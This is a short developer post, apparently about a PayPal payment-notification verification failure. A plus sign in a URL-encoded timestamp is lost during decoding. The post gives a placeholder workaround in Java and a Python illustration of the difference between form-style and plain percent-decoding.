Fri+Jul+08+2016+10%3A22%3A01+GMT+0800+%28Malay+Peninsula+Standard+Time%29
What I did was replace the + sign with a temporary placeholder before decoding, then, after decoding and encoding, revert the replacement.
Somehow this could not be verified by PayPal.
Okay, I got it working... not sure whether it's the best way, but it works now.
Basically, I patch the incoming parameter value by replacing + with a placeholder.
patchedValue = value.replace("+", "TEMPXXX");
....
In the end, after encoding, replace the placeholder with %2B, which is the percent-encoded + sign.
....
URLEncoder.encode(decodedValue, encoding).replace("+", "%20").replace("TEMPXXX", "%2B")
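The underlying effect can be reproduced in Python with the standard `urllib.parse` functions, shown here only to illustrate why the + disappears; it is not the Java code from the post, and whether PayPal expects exactly this re-encoded form is not established by the thread.

```python
from urllib.parse import quote, unquote, unquote_plus

incoming = ("Fri%20Jul%2008%202016%2010%3A22%3A01%20GMT+0800"
            "%20%28Malay%20Peninsula%20Standard%20Time%29")

# Form-style decoding treats a literal '+' as an encoded space.
form_decoded = unquote_plus(incoming)

# Plain percent-decoding leaves a literal '+' untouched.
plain_decoded = unquote(incoming)

print(form_decoded)   # ... GMT 0800 ...  (plus sign lost)
print(plain_decoded)  # ... GMT+0800 ...  (plus sign kept)

# Re-encoding with no safe characters turns '+' into %2B and ' ' into %20.
print(quote(plain_decoded, safe=""))
```

A decoder that does not map + to space removes the need for the placeholder step, since the literal + survives decoding and comes out as %2B when encoded again.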